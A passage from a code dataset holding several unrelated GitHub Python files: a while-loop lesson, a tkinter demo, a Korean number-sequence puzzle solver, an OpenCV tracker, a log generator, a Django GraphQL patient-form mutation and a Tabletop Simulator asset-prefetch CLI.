while isRaining:\n# \tprint(condition)\n# \tcondition += 1\n#\n# In this case, this loop would continue running while it was raining outside. \n# When the rain stopped, the loop would cease.\n# If you actually run the following code, you can stop it by doing ctrl+c to break it. 
\n# The following is an intentional infinite loop\nwhile True:\n\tprint('doing stuff!!')","repo_name":"SaretMagnoslove/Python_3_Basics_Tutorial_Series-Sentdex","sub_path":"Lesson04_while_loops.py","file_name":"Lesson04_while_loops.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13422146326","text":"#coding:utf8\r\nimport tkinter\r\n\"\"\"\r\n = (,,...)\r\n\r\n\"\"\"\r\ndef hello():\r\n print(\"hello\")\r\napp = tkinter.Tk()\r\nlabel_welcome=tkinter.Label(app,text = \"Bienvenu\")# au lieu de text justify qui fait meme effet que pack\r\nprint(label_welcome.cget(\"text\"))\r\nprint(label_welcome[\"text\"])\r\nlabel_welcome.configure(text =\"text\")\r\nlabel_welcome.pack()\r\nmessage_welcome = tkinter.Message(app,text =\"Bonjour\\n tout le monde bienvenu sur la chaine formation vidéo\")\r\nmessage_welcome.pack()\r\nentry_name = tkinter.Entry(app,width = \"45\",show = \"*\",exportselection=0)#export selection vers presse papier interdite\r\nentry_name.pack()\r\nbutton_quit = tkinter.Button(app,text = \"Quitter\",width =25,height =2,command =hello)\r\nbutton_quit.pack()\r\napp.mainloop()","repo_name":"CherifaHamroun/python-project","sub_path":"Cours/WidgetTkinter.py","file_name":"WidgetTkinter.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19199946217","text":"import itertools\nimport numpy as np\nfrom scipy import optimize\nfrom itertools import combinations, permutations, product\nimport re\n\nMAX_SEQ = 200\nDEBUG = False\nLOCAL = True\ndef make_seq(c,seq_type = 1):\n if seq_type ==2:\n return make_seq_poly(c)\n c0 = c[0]\n c1 = c[1]\n c2 = c[2]\n try:\n c3 = c[3]\n except:\n c3 = 0\n\n try:\n c4= c[4]\n except:\n c4 = 0\n\n seq=[]\n for i in range(MAX_SEQ):\n\n if i==0:\n seq.append(c0)\n elif i==1:\n seq.append(c1)\n else:\n\n seq.append(seq[i-2]*c2+seq[i-1]*c3)\n\n return seq\n\n\ndef make_seq_poly(c):\n c0 = c[0]\n c1 = c[1]\n try:\n c2 = c[2]\n except:\n c2 = 0\n try:\n c3 = c[3]\n except:\n c3 = 0\n\n\n seq=[]\n for i in range(MAX_SEQ):\n seq.append(c0+c1*i+c2*i**2+c3*i**3)\n return seq\n\n\ndef print_seq(c,seq_type=1):\n if LOCAL: print('predicted seq:',make_seq(c,seq_type)[:10])\n\ndef solve_seq_pattern(seq_inp, init=[1,1,1,0]):\n def cal_loss(c):\n seq_pred= make_seq(c)\n seq_pred = seq_pred[0:len(seq_inp)]\n loss = 0\n\n \n for i in range(len(seq_inp)):\n \n if seq_inp[i]>=0:\n loss = loss+ (seq_pred[i]-seq_inp[i])**2\n \n return loss\n\n def cal_loss_poly(c):\n seq_pred= make_seq_poly(c)\n seq_pred = seq_pred[0:len(seq_inp)]\n loss = 0\n\n \n for i in range(len(seq_inp)):\n \n if seq_inp[i]>=0:\n loss = loss+ (seq_pred[i]-seq_inp[i])**2\n \n return loss\n if LOCAL: print('1nd try: polynomical')\n\n n_seq = get_n_seq(seq_inp)\n x = init\n if len(x)>n_seq:\n x = x[0:n_seq]\n\n if len(x)>4:\n x = x[0:4]\n out = optimize.fmin(cal_loss_poly, x,xtol=1E-10,ftol=1E-20,maxiter=5000,full_output=True,disp=DEBUG)\n loss = out[1]\n if out[4]!=0:\n if LOCAL: print('max_iteration warning!(1)')\n if LOCAL: \n print('1st loss:', loss)\n print('c:',out[0])\n seq_type = 2\n\n if loss > 1E-1:\n seq_type = 1\n x = init\n if len(x)>=4:\n x = x[0:4]\n out = optimize.fmin(cal_loss, x,xtol=1E-10,ftol=1E-20,maxiter=5000,full_output=True,disp=DEBUG)\n loss = out[1]\n if LOCAL: print('2nd loss',loss)\n if out[4]!=0:\n if LOCAL: print('max_iteration warning!(1)')\n\n out_c = out[0].tolist()\n if 
LOCAL: print("out_c:",out_c)\n    if len(init)>n_seq:\n        out_c.append(0)\n    if LOCAL: print("out_c:",out_c)\n\n\n    return out_c, loss, seq_type\n\ndef cal_seq(c,n,seq_type=1):\n    seq = make_seq(c,seq_type)\n    return seq[n-1]\n\n\ndef find_seq(seq_inp,c,eq,seq_type=1):\n    seq_pred = make_seq(c,seq_type)\n    n_seq=get_n_seq(seq_inp)\n    c = c+[0,0,0]\n    code = ""\n    for i in range(len(seq_inp)):\n        if seq_inp[i]==-1:\n            A = seq_pred[i]\n            code = code+ 'A = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'A' : n = i\n        elif seq_inp[i]==-2:\n            B = seq_pred[i]\n            code = code+ 'B = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'B' : n = i\n        elif seq_inp[i]==-3:\n            C = seq_pred[i]\n            code = code+ 'C = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'C' : n = i\n        elif seq_inp[i]==-4:\n            D = seq_pred[i]\n            code = code+ 'D = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'D' : n = i\n        elif seq_inp[i]==-5:\n            X = seq_pred[i]\n            code = code+ 'X = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'X' : n = i\n        elif seq_inp[i]==-6:\n            Y = seq_pred[i]\n            code = code+ 'Y = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'Y' : n = i\n        elif seq_inp[i]==-7:\n            Z = seq_pred[i]\n            code = code+ 'Z = %f+%f*%d+%f*%d**2+%f*%d**3\\n'%(c[0],c[1],i,c[2],i,c[3],i)\n            if eq == 'Z' : n = i\n    if LOCAL: print(eq)\n    return eval(eq), code\n\ndef find_seq_string(seq,target):\n    seq_ori = seq\n    if LOCAL: print("find_seq_string:",target, seq)\n\n    if seq[-1] < 0:\n        seq = seq[:-1]\n\n    code = ''\n    code = code + "seq="+str(seq)+'\\n'\n\n\n    pattern_len = len(seq)\n    key = 0\n    for i, n in enumerate(seq):\n        if i==0: key = seq[i]\n        if i>1 and seq[i]==key:\n            pattern_len = i\n            break\n    code = code + "pattern_len = len(seq)\\n"\n    if LOCAL: print(seq)\n    if str(type(target))=="<class 'int'>":\n        \n        out = seq[(target-1)%pattern_len]\n        \n        code = code + "target=%d\\n"%target\n        code = code + "print(seq[(target-1)%pattern_len])"\n\n    else:\n        if target == 'A': \n            value = -1\n        if target == 'B': \n            value = -2\n        if target == 'C': \n            value = -3\n        if target == 'D': \n            value = -4\n        if target == 'X': \n            value = -5\n        if target == 'Y': \n            value = -6\n        if target == 'Z': \n            value = -7\n        idx = seq_ori.index(value)\n        out = seq_ori[idx%pattern_len]\n        code = code + "print(seq[%d%%%d])"%(idx,pattern_len)\n    \n    if LOCAL: print(code)\n    return out, code\n\ndef print_seq_eq(c,target,seq_type):\n    out = ''\n\n    if LOCAL: print('c:', c)\n    c.append(0)\n    c.append(0)\n\n    if seq_type ==2:\n        if str(type(target))=="<class 'str'>":\n            if len(target)==1:\n                n = len(target)\n                print("warning!!!!")\n                out = "print(int(round(%f+%f*%d+%f*%d**2+%f*%d**3)))"%(c[0],c[1],n,c[2],n,c[3],n)\n            else:\n                out = "print(int(round(%s)))\\n"%target\n        else:\n            n = target-1\n            out = "print(int(round(%f+%f*%d+%f*%d**2+%f*%d**3)))"%(c[0],c[1],n,c[2],n,c[3],n)\n\n    elif seq_type ==1:\n        out = out + 'c0 = %f\\n'%c[0]\n        out = out + 'c1 = %f\\n'%c[1]\n        out = out + 'c2 = %f\\n'%c[2]\n        out = out + 'c3 = %f\\n'%c[3]\n        out = out + 'c4 = %f\\n'%c[4]\n        out = out + 'seq=[]\\n'\n        out = out + 'for i in range(%d):\\n'%50\n        out = out + '    if i==0: seq.append(c0)\\n'\n        out = out + '    elif i==1: seq.append(c1)\\n'\n        out = out + '    else: seq.append(seq[i-2]*c2+seq[i-1]*c3)\\n'\n\n        if str(type(target))=="<class 'str'>":\n            out = out + 'print(%s)'%target\n        else:\n            out = out + 'print(seq[%d])'%(target-1)\n    return out\n\ndef find_index_string(seq, w):\n    key = 0\n    if w=='A': key = -1\n    if w=='B': key = -2\n    if w=='C': key = -3\n    if w=='D': key = 
-4\n    if w=='X': key = -5\n    if w=='Y': key = -6\n    if w=='Z': key = -7\n\n\n    if key==0:\n        return 0\n    else:\n        return seq.index(key)\n\ndef get_n_seq(seq):\n\n    seq_new = [x for x in seq if x>=0]\n    n_seq = len(seq_new)\n\n    return n_seq\n\ndef seq_pred(seq_str,targets=[],eqs=''):\n    if LOCAL: print('initial:', targets, eqs)\n    seq_ori = seq_str\n\n    seq_str = seq_str.replace('A', '-1')\n    seq_str = seq_str.replace('B', '-2')\n    seq_str = seq_str.replace('C', '-3')\n    seq_str = seq_str.replace('D', '-4')\n    seq_str = seq_str.replace('X', '-5')\n    seq_str = seq_str.replace('Y', '-6')\n    seq_str = seq_str.replace('Z', '-7')\n\n    if LOCAL: print(seq_str)\n\n    seq = eval(seq_str)\n    target = None\n\n    if len(targets)==1:\n        target = targets[0]\n\n    if str(type(seq[0]))=="<class 'str'>" :\n        if LOCAL: print('string')\n        return find_seq_string(seq,len(seq)+1)\n\n    n_seq = get_n_seq(seq)\n    if LOCAL: print("no of seq:", n_seq)\n    c,loss,seq_type = solve_seq_pattern(seq, [seq[0],1,0,0,0])\n\n    if LOCAL: print('targets=', targets)\n    if str(type(target))=="<class 'str'>":\n        if target.isdigit() == True:\n            target = int(target)\n\n    if len(targets)>1:\n        if LOCAL: print('multiple target! output eq:',targets)\n        code = ""\n        for idx, tar in enumerate(targets):\n            if idx==0:\n                A = cal_seq(c,tar,seq_type)\n                if LOCAL: print('A=',A)\n                if seq_type == 2:\n                    code = code +"A = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'A=%d\\n'%A\n            elif idx==1:\n                B = cal_seq(c,tar,seq_type)\n                if LOCAL: print('B=',B)\n                if seq_type == 2:\n                    code = code +"B = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'B=%d\\n'%B\n            elif idx==2:\n                C = cal_seq(c,tar,seq_type)\n                if LOCAL: print('C=',C)\n                if seq_type == 2:\n                    code = code +"C = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'C=%d\\n'%C\n            elif idx==3:\n                D = cal_seq(c,tar,seq_type)\n                if LOCAL: print('D=',D)\n                if seq_type == 2:\n                    code = code +"D = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'D=%d\\n'%D\n\n            elif idx==4:\n                X = cal_seq(c,tar,seq_type)\n                if LOCAL: print('X=',X)\n                if seq_type == 2:\n                    code = code +"X = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'X=%d\\n'%X\n\n            elif idx==5:\n                Y = cal_seq(c,tar,seq_type)\n                if LOCAL: print('Y=',Y)\n                if seq_type == 2:\n                    code = code +"Y = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'Y=%d\\n'%Y\n            elif idx==6:\n                Z = cal_seq(c,tar,seq_type)\n                if LOCAL: print('Z=',Z)\n                if seq_type == 2:\n                    code = code +"Z = %f+%f*%d+%f*%d**2+%f*%d**3\\n"%(c[0],c[1],tar-1,c[2],tar-1,c[3],tar-1)\n                else:\n                    code = code +'Z=%d\\n'%Z \n            \n        out = eval(eqs)\n        if LOCAL: print('eqs:', eqs)\n        if LOCAL: print(eqs, out)\n        code = code + 'print(int(round(%s)))'%eqs\n        return out, code\n\n    if LOCAL: print('target:',target)\n    if str(type(target))=="<class 'int'>": \n        if loss > 1:\n            if LOCAL: print('solve by string pattern (int target)')\n            return find_seq_string(seq,target)\n        else:\n            if LOCAL: print("simple seq")\n            if LOCAL: print_seq(c,seq_type)\n            return cal_seq(c,target,seq_type), print_seq_eq(c,target,seq_type)\n    else:\n        if LOCAL: print("case of equation output")\n        if loss > 1:\n            if LOCAL: print('solve by string pattern (string target)')\n            return find_seq_string(seq,eqs)\n        else:\n            if LOCAL: print_seq(c,seq_type)\n            \n            out, code = find_seq(seq,c,eqs,seq_type)\n            \n            index = find_index_string(seq,eqs)\n            if index ==0:\n                return out, code+ 
print_seq_eq(c,eqs,seq_type)\n else:\n return out, code+ print_seq_eq(c,index+1,seq_type)\n\n## find variable by optimization...\ndef solve(eq):\n eq = '(('+eq+'))**2'\n eq = eq.replace('=',')-(')\n if LOCAL: print(eq)\n\n def cal_loss(x):\n out = eval(eq)\n return out\n\n out = optimize.fmin(cal_loss, 0, xtol=0.00000001, ftol=0.00000001, maxiter=1500, full_output=True, disp=DEBUG)\n\n out = round(out[0][0],2)\n if LOCAL: print(out)\n\n return \n\n\nkorean = re.compile('[\\u3131-\\u3163\\uac00-\\ud7a3]+')\nspecial_char = '?.,_'\ndef delete_str(word, chars):\n\n for char in chars:\n word = word.replace(char,'')\n return word\n\n\ndef solve_seq(input):\n\n text_nokor= re.sub(korean, '_', input).strip()\n if LOCAL: print(text_nokor)\n\n words = re.findall(r\"[\\w']+\", text_nokor)\n find_num = False\n seqs = []\n\n if LOCAL: print(words)\n\n for word in words:\n\n if word.isalnum() :\n if word.isdigit()==True:\n find_num = True\n seqs.append(word)\n else:\n n = input.index(word)\n if find_num == True or input[n+1] == ',':\n find_num = True\n seqs.append(word)\n\n if find_num == True:\n if word.isalnum() == False:\n word = word.split('_')[0]\n if word!='':\n seqs.append(word)\n break\n\n if LOCAL: print(\"sequence list:\",seqs)\n seq_str= \",\".join(seqs)\n if LOCAL: print(seq_str)\n\n\n words = text_nokor.split(' ')\n eqs = ''\n\n targets = find_target_no(input)\n \n for word in words:\n word = delete_str(word, special_char)\n word = word.replace(' ','')\n\n if word!='':\n eqs = word\n\n if LOCAL: print(\"ans:\", eqs)\n\n return seq_pred(seq_str, targets, eqs)\n\n\ndef find_target_no(inp):\n if '번 째' in inp:\n inp = inp.replace('번 째', '번째')\n elif not('번째' in inp):\n inp = inp.replace('째', '번째')\n inp = inp.replace('번째', ' 번째')\n \n if LOCAL: print(inp)\n \n words = inp.split(' ')\n targets = []\n target = 0\n for idx, word in enumerate(words):\n if '번째' in word:\n w = words[idx-1]\n if '첫' in w:\n target = 1\n elif '두' in w:\n target = 2\n elif '세' in w:\n target = 3\n else:\n target = int(w)\n targets.append(target)\n\n if LOCAL: print(targets)\n return targets\n \n\ndef seq_solver(question:str, local = False):\n global LOCAL\n LOCAL = local\n\n ans, code = solve_seq(question)\n ans = int(round(ans))\n if local:\n print('ans:',ans)\n print(code)\n return { 'answer': ans, 'equation': code}\n\n\nif __name__ == \"__main__\":\n q_list = [\"주어진 숫자가 31, A, 33, 34, 35, B, 37, 38 일 경우, B-A에 해당하는 알맞은 수는 무엇일까요?\",\n \"2, 4, 8, 14, 22 에서 7번째에 올 수를 구하시오.\",\n \"1, 17, 33, 49, 65와 같은 규칙에서 25번째 놓일 수와 40번째 놓일 수를 각각 A와 B라 할 때, B-A를 구하시오.\",\n \"주어진 숫자가 31, A, 33, 34, 35, B, 37, 38 일 경우, B-A에 해당하는 알맞은 수는 무엇일까요?\",\n \"2, 4, 8, 14, 22 에서 7번째에 올 수를 구하시오.\",\n \"1, 17, 33, 49, 65와 같은 규칙에서 25번째 놓일 수와 40번째 놓일 수를 각각 A와 B라 할 때, B-A를 구하시오.\",\n \"주어진 숫자가 31, A, 33, 34, 35, B, 37, 38 일 경우, B에 해당하는 알맞은 수는 무엇일까요?\",\n \"1,2,3,4,5,6,7,1,2,3,4,5,6,7과 같이 반복되는 수열이 있습니다. 왼쪽에서 57번째 숫자는 무엇입니까?\",\n \"1, 5, 14, 30, 55, 91과 같은 규칙으로 수를 배열하고 있습니다. 9번째 수는 무엇입니까?\",\n \"자연수를 규칙에 따라 4, 7, 10, A, 16, 19로 배열하였습니다. 
A에 알맞은 수를 구하시오.\"]\n for i, q in enumerate(q_list):\n a = seq_solver(q, False)['answer']\n print(f\"{i+1:2d} 번째 문제\\n - {'문제':2s}: {q}\\n - {'답':^3s}: {a}\\n\")\n","repo_name":"jkc-ai/mwp-korean-2021","sub_path":"solver/seq_solver.py","file_name":"seq_solver.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"11527463705","text":"import cv2\n\n\ndef main():\n cam = cv2.VideoCapture(0)\n tracker = cv2.Tracker_()\n while True:\n (ok, frame) = cam.read()\n if not ok:\n break\n # Start timer\n timer = cv2.getTickCount()\n\n # Update tracker\n (ok, bbox) = tracker.update(frame)\n\n # Calculate Frames per second (FPS)\n fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)\n # Draw bounding box\n if ok:\n draw_target(frame, bbox)\n else:\n # Tracking failure\n print(\"Failed to detect\")\n # Display tracker type on frame\n cv2.putText(frame, \" Tracker\", (100, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2);\n # Display FPS on frame\n cv2.putText(frame, \"FPS : \" + str(int(fps)), (100, 50), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50, 170, 50), 2);\n # Display result\n cv2.imshow(\"Tracking\", frame)\n # Teclado\n key = cv2.waitKey(10)\n if key == 27:\n break\n cam.release()\n cv2.destroyAllWindows()\n\n\ndef draw_target(img, box):\n (height, width, _) = img.shape\n (x, y, w, h) = box\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 1)\n # Scope\n s_x = int(x + w / 2)\n s_y = int(y + h / 2)\n cv2.line(img, (0, s_y), (width, s_y), (0, 0, 200), 2)\n cv2.line(img, (s_x, 0), (s_x, height), (0, 0, 200), 2)\n cv2.circle(img, (s_x, s_y), 10, (0, 0, 200), 2)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Migarve55/omni-turret-control","sub_path":"vision/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72215795367","text":"import numpy as np\n\ndef main(number_of_lines):\n types = ['/index', '/test', '/home']\n with open('log.txt', 'w') as file:\n for i in range(number_of_lines):\n file.write('{},{},{}\\n'.format(\n i, types[np.random.randint(0, 3)], np.random.binomial(1, 0.3)))\n\nif __name__ == '__main__':\n main(1000000)\n","repo_name":"NikolayLutsyak/testing_to_ya_taxi","sub_path":"make_log.py","file_name":"make_log.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17717925693","text":"import graphene\nfrom stewardship.models import (\n Sepsis,\n Patient,\n FocusOfInfection,\n CultureReport,\n ClinicalSign,\n AntibioticSensitivity,\n Antibiotic,\n Imaging,\n PatientForm,\n)\nfrom stewardship.graphql.types import PatientDataFormObj\nfrom stewardship.graphql.inputs import PatientFormInput\nfrom main.api.API_Exceptions import APIException\n\n\nclass PatientFormResponse(graphene.ObjectType):\n success = graphene.Boolean()\n returning = graphene.Field(PatientDataFormObj)\n\n\nclass PatientDataForm(graphene.Mutation, description=\"Patient Daily data form\"):\n class Arguments:\n inputs = graphene.Argument(\n PatientFormInput,\n required=True,\n description=\"inputs available for creation\",\n )\n\n @staticmethod\n def mutate(self, info, inputs: PatientFormInput):\n patientObject = Patient.objects.get(id=inputs.patient)\n\n sepsis = Sepsis.objects.create(\n isSepsis=inputs.sepsis.isSepsis,\n isSepticShock=inputs.sepsis.isSepticShock,\n 
isNeutropenicSepsis=inputs.sepsis.isNeutropenicSepsis,\n )\n\n focusOfInfection = FocusOfInfection.objects.create(\n isUTI=inputs.focusOfInfection.isUTI,\n isCNS=inputs.focusOfInfection.isCNS,\n isPneumonia=inputs.focusOfInfection.isPneumonia,\n isSkin=inputs.focusOfInfection.isSkin,\n isAbdominal=inputs.focusOfInfection.isAbdominal,\n isPrimaryBacteraemia=inputs.focusOfInfection.isPrimaryBacteraemia,\n isSecondaryBacteraemia=inputs.focusOfInfection.isSecondaryBacteraemia,\n isCatheterLinesStents=inputs.focusOfInfection.isCatheterLinesStents,\n isCAI = inputs.focusOfInfection.isCAI,\n isHAI = inputs.focusOfInfection.isHAI,\n other=inputs.focusOfInfection.other,\n )\n\n culture_reports = []\n for culture_report_input in inputs.cultureReport:\n imaging = Imaging.objects.create(\n isxRay=culture_report_input.Imaging.isxRay,\n isCTScan=culture_report_input.Imaging.isCTScan,\n isMRI=culture_report_input.Imaging.isMRI,\n isUltraSound=culture_report_input.Imaging.isUltraSound,\n isPETScan=culture_report_input.Imaging.isPETScan,\n impression=culture_report_input.Imaging.impression,\n )\n antibioticSensitivityList = []\n for antibiotics in culture_report_input.antibioticSensitivity:\n antibioticSensitivity = AntibioticSensitivity.objects.create(\n antibiotic=antibiotics,\n )\n antibioticSensitivityList.append(antibioticSensitivity)\n\n culture_report = CultureReport.objects.create(\n time_sent=culture_report_input.timeSent,\n time_reported=culture_report_input.timeReported,\n sentBeforeAntibiotic=culture_report_input.sentBeforeAntibiotic,\n multi_drug_resistant=culture_report_input.multiDrugResistance,\n specimen_type=culture_report_input.specimenType,\n site_of_collection=culture_report_input.siteOfCollection,\n organism=culture_report_input.organism,\n resistance=culture_report_input.resistance,\n Imaging=imaging,\n )\n culture_report.antibiotic_sensitivity.set(antibioticSensitivityList)\n culture_reports.append(culture_report)\n\n antibiotics_used = []\n for antibiotic_used_input in inputs.antibioticUsed:\n antibiotic_used = Antibiotic.objects.create(\n initial_date=antibiotic_used_input.initialDate,\n antibiotic=antibiotic_used_input.antibiotic,\n loading_dose=antibiotic_used_input.loadingDose,\n maintenance_dose=antibiotic_used_input.maintenanceDose,\n route=antibiotic_used_input.route,\n frequency=antibiotic_used_input.frequency,\n duration=antibiotic_used_input.duration,\n end_date=antibiotic_used_input.endDate,\n )\n antibiotics_used.append(antibiotic_used)\n\n clinical_signsList = []\n for clinical_signs_input in inputs.clinicalSign:\n clinical_signs = ClinicalSign.objects.create(\n date=clinical_signs_input.date,\n patient=patientObject,\n procalcitonin=clinical_signs_input.procalcitonin,\n white_blood_cell=clinical_signs_input.whiteBloodCell,\n neutrophil=clinical_signs_input.neutrophil,\n s_creatinine=clinical_signs_input.sCreatinine,\n cratinine_clearance=clinical_signs_input.cratinineClearance,\n o2_saturation=clinical_signs_input.o2Saturation,\n blood_pressure=clinical_signs_input.bloodPressure,\n temperature=clinical_signs_input.temperature,\n )\n clinical_signsList.append(clinical_signs)\n\n try:\n patientForm = PatientForm.objects.create(\n patient=patientObject,\n review_date=inputs.reviewDate,\n review_department=inputs.reviewDepartment,\n provisional_diagnosis=inputs.provisionalDiagnosis,\n final_diagnosis=inputs.finalDiagnosis,\n syndromic_diagnosis=inputs.syndromicDiagnosis,\n diagnosis_choice=inputs.diagnosisChoice,\n focus_of_infection=focusOfInfection,\n sepsis=sepsis,\n 
isculture_report=True,\n draft=inputs.draft,\n )\n patientForm.culture_report.set(culture_reports)\n patientForm.antibiotic_used.set(antibiotics_used)\n\n except Exception as e:\n print(\"Error: \", e)\n raise APIException(message=e, code=400)\n \n if inputs.draft == False:\n patientObject.lastReviewDate = inputs.reviewDate\n patientObject.save()\n\n try:\n if PatientForm.objects.filter(patient=inputs.patient, draft=True).exists():\n form = PatientForm.objects.get(patient=inputs.patient, draft=True)\n form.delete()\n # make a not found error\n except Exception as e:\n print(\"Error: \", e)\n raise APIException(message=e, code=400)\n\n patientForm.save()\n\n return PatientFormResponse(success=True, returning=patientForm)\n\n Output = PatientFormResponse\n","repo_name":"anshuman-8/antibiotic-stewardship-server","sub_path":"stewardship/graphql/mutations/patientDataForm.py","file_name":"patientDataForm.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38601111231","text":"import sys\n\n\ndef main():\n nums = list(map(int, input().split()))\n lookup = dict()\n a, c = min(nums), max(nums)\n b = [i for i in nums if a < i < c][0]\n\n lookup['A'], lookup['B'], lookup['C'] = str(a), str(b), str(c)\n res = []\n for i in input():\n res.append(lookup[i])\n\n print(' '.join(res))\n\n\nif __name__== '__main__':\n main()\n","repo_name":"fr3632ho/various","sub_path":"src/easy/ABC/abc.py","file_name":"abc.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22978078165","text":"from tts_tools.libtts import GAMEDATA_DEFAULT\nfrom tts_tools.prefetch import prefetch_files\n\nimport argparse\nimport signal\nimport sys\n\n\nparser = argparse.ArgumentParser(\n description=\"Download assets referenced in TTS .json files.\"\n)\n\nparser.add_argument(\n \"infile_names\",\n metavar=\"FILENAME\",\n nargs=\"+\",\n help=\"The save file or mod in JSON format.\",\n)\n\nparser.add_argument(\n \"--gamedata\",\n dest=\"gamedata_dir\",\n metavar=\"PATH\",\n default=GAMEDATA_DEFAULT,\n help=\"The path to the TTS game data directory.\",\n)\n\nparser.add_argument(\n \"--dry-run\",\n \"-n\",\n dest=\"dry_run\",\n default=False,\n action=\"store_true\",\n help=\"Only print which files would be downloaded.\",\n)\n\nparser.add_argument(\n \"--refetch\",\n \"-r\",\n dest=\"refetch\",\n default=False,\n action=\"store_true\",\n help=\"Rewrite objects that already exist in the cache.\",\n)\n\nparser.add_argument(\n \"--relax\",\n \"-x\",\n dest=\"ignore_content_type\",\n default=False,\n action=\"store_true\",\n help=\"Do not abort when encountering an unexpected MIME type.\",\n)\n\nparser.add_argument(\n \"--timeout\",\n \"-t\",\n dest=\"timeout\",\n default=5,\n type=int,\n help=\"Connection timeout in s.\",\n)\nparser.add_argument(\n \"--user-agent\",\n \"-a\",\n dest=\"user_agent\",\n default=\"tts-backup\",\n help=\"HTTP user-agent string.\",\n)\n\n\ndef sigint_handler(signum, frame):\n sys.exit(1)\n\n\ndef console_entry():\n\n signal.signal(signal.SIGINT, sigint_handler)\n signal.signal(signal.SIGTERM, sigint_handler)\n args = parser.parse_args()\n prefetch_files(args)\n","repo_name":"eigengrau/tts-backup","sub_path":"src/tts_tools/prefetch/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"53"} 
+{"seq_id":"35503175415","text":"\r\n#N1\r\ndef min_value(dict):\r\n values = dict.values()\r\n return min(values)\r\n\r\ndict1 = {'1' : 10, '2' : 20, '3' : 30, '4' : 40}\r\nminimum_value = min_value(dict1)\r\nprint(minimum_value)\r\n\r\n#N2\r\ndef factorial(x):\r\n if x == 0:\r\n return 1\r\n else:\r\n return x * factorial(x - 1)\r\nnum= int(input('შეიყვანეთ რიცხვი:'))\r\nresult = factorial(num)\r\nprint(num, 'ის ფაქტორიალი არის:', result)","repo_name":"mebonia/skillwill","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"ka","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26201811886","text":"from sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\nfrom data_prepocessing import load_dataset\r\nfrom lab1.my_knn import MyKNN\r\nfrom lab1.my_naive_bayes import MyGaussianNaiveBayes\r\n\r\n\r\ndef main():\r\n # готовим датасет\r\n inputs_train, outputs_train, inputs_test, outputs_test = load_dataset(split_ratio=.4, normalize=True)\r\n # готовим классификаторы\r\n classificators = [\r\n MyGaussianNaiveBayes(),\r\n GaussianNB(),\r\n MyKNN(n_neighbors=75),\r\n KNeighborsClassifier(n_neighbors=75)\r\n ]\r\n # оцениваем работу каждого классификатора\r\n for clf in classificators:\r\n clf.fit(inputs_train, outputs_train)\r\n print(clf, '\\nAccuracy: ', clf.score(inputs_test, outputs_test), '\\n--------------')\r\n\r\nmain()\r\n","repo_name":"Omenstudio/ITMO-labs-machine-learning","sub_path":"lab1/lab_1_main.py","file_name":"lab_1_main.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22370124778","text":"import logging\nfrom typing import Optional\n\nfrom httpx import Timeout\n\nfrom firebolt.client import (\n DEFAULT_API_URL,\n Auth,\n Client,\n log_request,\n log_response,\n raise_on_4xx_5xx,\n)\nfrom firebolt.common import Settings\nfrom firebolt.db import connect\nfrom firebolt.utils.util import fix_url_schema\n\nDEFAULT_TIMEOUT_SECONDS: int = 60 * 2\n\nlogger = logging.getLogger(__name__)\n\nSETTINGS_DEPRECATION_MESSAGE = \"\"\"\nUsing Settings objects for ResourceManager intialization is deprecated.\nPlease pass parameters directly\nExample:\n >>> rm = 